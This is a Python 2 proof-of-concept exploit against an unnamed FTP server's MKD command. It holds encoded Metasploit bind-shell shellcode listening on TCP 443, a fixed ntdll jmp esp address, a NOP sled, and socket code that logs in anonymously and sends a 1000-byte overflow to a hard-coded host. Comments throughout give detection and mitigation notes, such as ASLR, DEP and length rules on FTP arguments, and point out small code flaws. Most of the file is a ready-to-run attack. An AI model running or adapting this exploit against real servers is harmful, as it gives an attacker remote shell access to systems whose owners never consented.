#!/usr/bin/python

import socket
import sys

#------------------------------------------
# Proof-of-concept overflow against an FTP server's MKD command handler
# (the vulnerable product is not named in this file). The payload was
# produced with the generator command recorded by the author below:
#msfpayload windows/shell_bind_tcp LPORT=443 R| msfencode -b '\x00\x0a\x0d\' -t c
#x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# Defender notes: per the generator line the payload is a bind shell on
# TCP 443, so a successful run shows up as a new listening socket on that
# port on the FTP host. The delivery is an anonymous login followed by a
# 1000-byte MKD argument (see `evil` below), which a length-based rule on
# FTP command arguments catches easily.
#------------------------------------------
shellcode = ("\xda\xd2\xd9\x74\x24\xf4\x5a\xbe\xda\x4f\xc5\x7d\x31\xc9\xb1" +
"\x56\x83\xc2\x04\x31\x72\x14\x03\x72\xce\xad\x30\x81\x06\xb8" +
"\xbb\x7a\xd6\xdb\x32\x9f\xe7\xc9\x21\xeb\x55\xde\x22\xb9\x55" +
"\x95\x67\x2a\xee\xdb\xaf\x5d\x47\x51\x96\x50\x58\x57\x16\x3e" +
"\x9a\xf9\xea\x3d\xce\xd9\xd3\x8d\x03\x1b\x13\xf3\xeb\x49\xcc" +
"\x7f\x59\x7e\x79\x3d\x61\x7f\xad\x49\xd9\x07\xc8\x8e\xad\xbd" +
"\xd3\xde\x1d\xc9\x9c\xc6\x16\x95\x3c\xf6\xfb\xc5\x01\xb1\x70" +
"\x3d\xf1\x40\x50\x0f\xfa\x72\x9c\xdc\xc5\xba\x11\x1c\x01\x7c" +
"\xc9\x6b\x79\x7e\x74\x6c\xba\xfc\xa2\xf9\x5f\xa6\x21\x59\x84" +
"\x56\xe6\x3c\x4f\x54\x43\x4a\x17\x79\x52\x9f\x23\x85\xdf\x1e" +
"\xe4\x0f\x9b\x04\x20\x4b\x78\x24\x71\x31\x2f\x59\x61\x9d\x90" +
"\xff\xe9\x0c\xc5\x86\xb3\x58\x2a\xb5\x4b\x99\x24\xce\x38\xab" +
"\xeb\x64\xd7\x87\x64\xa3\x20\xe7\x5f\x13\xbe\x16\x5f\x64\x96" +
"\xdc\x0b\x34\x80\xf5\x33\xdf\x50\xf9\xe6\x70\x01\x55\x58\x31" +
"\xf1\x15\x08\xd9\x1b\x9a\x77\xf9\x23\x70\x0e\x3d\xea\xa0\x43" +
"\xaa\x0f\x57\x62\x91\x99\xb1\x0e\xf5\xcf\x6a\xa6\x37\x34\xa3" +
"\x51\x47\x1e\x9f\xca\xdf\x16\xc9\xcc\xe0\xa6\xdf\x7f\x4c\x0e" +
"\x88\x0b\x9e\x8b\xa9\x0c\x8b\xbb\xa0\x35\x5c\x31\xdd\xf4\xfc" +
"\x46\xf4\x6e\x9c\xd5\x93\x6e\xeb\xc5\x0b\x39\xbc\x38\x42\xaf" +
"\x50\x62\xfc\xcd\xa8\xf2\xc7\x55\x77\xc7\xc6\x54\xfa\x73\xed" +
"\x46\xc2\x7c\xa9\x32\x9a\x2a\x67\xec\x5c\x85\xc9\x46\x37\x7a" +
"\x80\x0e\xce\xb0\x13\x48\xcf\x9c\xe5\xb4\x7e\x49\xb0\xcb\x4f" +
"\x1d\x34\xb4\xad\xbd\xbb\x6f\x76\xcd\xf1\x2d\xdf\x46\x5c\xa4" +
"\x5d\x0b\x5f\x13\xa1\x32\xdc\x91\x5a\xc1\xfc\xd0\x5f\x8d\xba" +
"\x09\x12\x9e\x2e\x2d\x81\x9f\x7a")
#------------------------------------------
#Badchars: \x00\x0A\x0D
#0x7Ca58265: jmp esp # ret | ntdll.dll
# The 4-byte value spliced into `evil` below is the little-endian form of
# this fixed ntdll.dll address. A hard-coded address like this only works
# when the module is loaded at a predictable base, so ASLR (and DEP, since
# the payload executes from the stack) on the target is the mitigation.
#------------------------------------------
# 20-byte NOP sled followed by the 368-byte encoded payload: 388 bytes.
buffer = "\x90"*20 + shellcode
# 247 bytes of filler before the 4-byte return-address overwrite, then the
# sled+payload, then "C" padding so the MKD argument is always exactly
# 1000 bytes long (247 + 4 + 749) regardless of the payload size.
evil = "A"*247 + "\x65\x82\xa5\x7c" + buffer + "C"*(749-len(buffer))

# Target host and port are hard-coded. socket.connect() returns None, so
# the `connect` name is never meaningful.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.2.130",21))

# Written for Python 2: str objects are passed straight to send(). Every
# server reply is read and discarded; no FTP status code is ever checked.
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS a@a\r\n")
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
# NOTE(review): missing call parentheses -- this only references the bound
# method; the socket is closed when the object is garbage-collected.
s.close
